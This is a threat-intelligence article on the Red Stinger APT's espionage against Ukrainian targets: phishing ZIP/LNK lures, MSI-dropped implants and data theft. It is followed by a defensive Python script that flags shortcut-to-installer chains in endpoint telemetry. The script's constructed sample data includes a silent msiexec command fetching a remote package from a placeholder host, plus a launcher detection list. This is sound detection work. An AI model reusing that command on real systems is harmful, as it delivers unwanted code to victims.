The digital world is continuously evolving, and with it, the threats that lurk within. One such threat is an Advanced Persistent Threat (APT) group known as “Red Stinger.” The group has gained notoriety for its stealthy and targeted attacks since 2020, primarily across Eastern Europe. The group’s operations are characterized by a high degree of sophistication and persistence, making them a significant concern for cybersecurity professionals.
The Red Stinger APT emerged in 2020, carrying out espionage operations in Eastern Europe, notably in Ukraine. Researchers from Malwarebytes and Kaspersky have linked the group to five major operations conducted from 2020 to 2022. The group targeted military, transportation, and critical infrastructure entities, as well as individuals involved in the September East Ukraine referendums. The group’s operations have been notably aggressive, and their persistence underscores the high probability of state funding.
The last two of these operations were named “Operation Four” and “Operation Five.” The former targeted a member of Ukraine’s military who works on critical infrastructure, exfiltrating screenshots and documents and even recording audio from the victim’s microphone. Operation Five targeted multiple election officials running Russian referendums in disputed cities in Ukraine, demonstrating the group’s interest in political processes.
Red Stinger’s tradecraft is not technically elaborate, but it is effective. The group opens its campaigns with phishing messages carrying malicious links that lead to ZIP archives, documents, and Windows shortcut (LNK) files. Once these are opened, the group uses basic scripts that act as a backdoor and as a loader for its malware.
One of the significant tools associated with Red Stinger is the DBoxShell (aka PowerMagic) implant, which was dropped on compromised systems via malicious MSI installer files. The installer was fetched by means of a Windows shortcut file contained within a ZIP archive. The group’s attack sequence evolved only slightly over time, with minor variations in the MSI file names observed in the subsequent waves of attacks in April and September 2021.
In February 2022, coinciding with Russia’s military invasion of Ukraine, a fourth set of attacks was executed by Red Stinger. During this wave of attacks, two victims located in central Ukraine – a military target and an officer working in critical infrastructure – were compromised. The group exfiltrated screenshots, microphone recordings, and office documents after a period of reconnaissance, with one of the victims also having their keystrokes logged and uploaded. The last known activity associated with Red Stinger took place in September 2022, as documented by Kaspersky.
The Red Stinger APT remains a threat in the cyber landscape. The group continues to refine its methods, creating new tools to evade detection and maintain its persistent and aggressive approach to cyber espionage. Its primary goal seems to be surveillance and data gathering, with a clear focus on specific entities aligned with Russia and Ukraine.
In the face of such threats, cybersecurity professionals must remain vigilant. As the Malwarebytes researchers suggested, organizations should deploy detections for Red Stinger operations and search their own telemetry for historical indications of the group’s activity. Regularly updating security systems and educating users about the risks of phishing attacks can also help mitigate the risk of compromise by groups like Red Stinger.
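The infection chain described above (shortcut file opened out of a ZIP, which then fetches an MSI installer or runs a loader script) is something the telemetry hunt recommended here can be keyed on. The following is an added example, not code from the original write-up or from either research team: it correlates Sysmon-style file-creation and process-creation events so that a `.lnk` written to a Temp folder (where the Windows shell and archive tools extract on open) followed shortly by Explorer spawning `msiexec.exe` or a script host is flagged. The event records, paths, hostnames and the `example.invalid` URL are all constructed; the two-minute window and the list of launcher processes are assumptions to tune per environment.

```python
import json
from datetime import datetime, timedelta

# Constructed Sysmon-style events (not real Red Stinger telemetry). WS1 and WS3 model the chain
# described in the write-up; WS2 is a benign shortcut on the Desktop and must not be flagged.
SAMPLE_EVENTS = r"""
{"ts":"2022-02-10T09:00:01","host":"WS1","type":"file_create","image":"C:\\Windows\\explorer.exe","target":"C:\\Users\\u\\AppData\\Local\\Temp\\Temp1_invite.zip\\invite.lnk"}
{"ts":"2022-02-10T09:00:04","host":"WS1","type":"proc_create","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\msiexec.exe","cmdline":"msiexec.exe /i http://example.invalid/PLACEHOLDER.msi /q"}
{"ts":"2022-02-10T09:30:00","host":"WS2","type":"file_create","image":"C:\\Windows\\explorer.exe","target":"C:\\Users\\u\\Desktop\\report.lnk"}
{"ts":"2022-02-10T09:30:02","host":"WS2","type":"proc_create","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\msiexec.exe","cmdline":"msiexec.exe /i C:\\Users\\u\\Desktop\\setup.msi"}
{"ts":"2022-02-10T10:00:00","host":"WS3","type":"file_create","image":"C:\\Program Files\\7-Zip\\7zFM.exe","target":"C:\\Users\\u\\AppData\\Local\\Temp\\7zO4A1\\notes.lnk"}
{"ts":"2022-02-10T10:00:20","host":"WS3","type":"proc_create","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\7zO4A1\\run.vbs"}
"""

ARCHIVE_TEMP_HINTS = ("\\appdata\\local\\temp\\",)  # assumption: where shell/7-Zip extract on open
LAUNCHERS = {"msiexec.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}  # assumption
WINDOW = timedelta(minutes=2)  # assumption: max gap between LNK drop and launcher spawn

def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def lnk_from_archive(ev):
    """True for a .lnk written into a Temp extraction folder."""
    t = ev.get("target", "").lower()
    return ev["type"] == "file_create" and t.endswith(".lnk") and any(h in t for h in ARCHIVE_TEMP_HINTS)

def launcher_from_explorer(ev):
    """True when Explorer (i.e. a double-clicked shortcut) spawns an installer or script host."""
    return (ev["type"] == "proc_create"
            and ev["parent"].lower().endswith("\\explorer.exe")
            and ev["image"].lower().rsplit("\\", 1)[-1] in LAUNCHERS)

def find_lnk_to_launcher_chains(events, window=WINDOW):
    """Return (host, lnk_path, launcher_cmdline) for each archive-dropped LNK followed, within
    the window on the same host, by Explorer launching one of LAUNCHERS."""
    hits, pending = [], {}  # pending: host -> (drop_time, lnk_path)
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if lnk_from_archive(ev):
            pending[ev["host"]] = (ts, ev["target"])
        elif launcher_from_explorer(ev) and ev["host"] in pending:
            drop_ts, lnk = pending[ev["host"]]
            if ts - drop_ts <= window:
                hits.append((ev["host"], lnk, ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for host, lnk, cmd in find_lnk_to_launcher_chains(parse_events(SAMPLE_EVENTS)):
        print(f"[{host}] archive-dropped LNK {lnk} -> {cmd}")
```

On the constructed sample this reports WS1 (LNK out of a ZIP, then an MSI fetched over HTTP) and WS3 (LNK from a 7-Zip temp folder, then a VBScript loader), and stays silent on WS2.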
In conclusion, Red Stinger remains a mysterious and formidable player in the world of cyber threats. Its operations serve as a stark reminder of the constant evolution of cyber threats and the need for continuous vigilance and robust cybersecurity measures.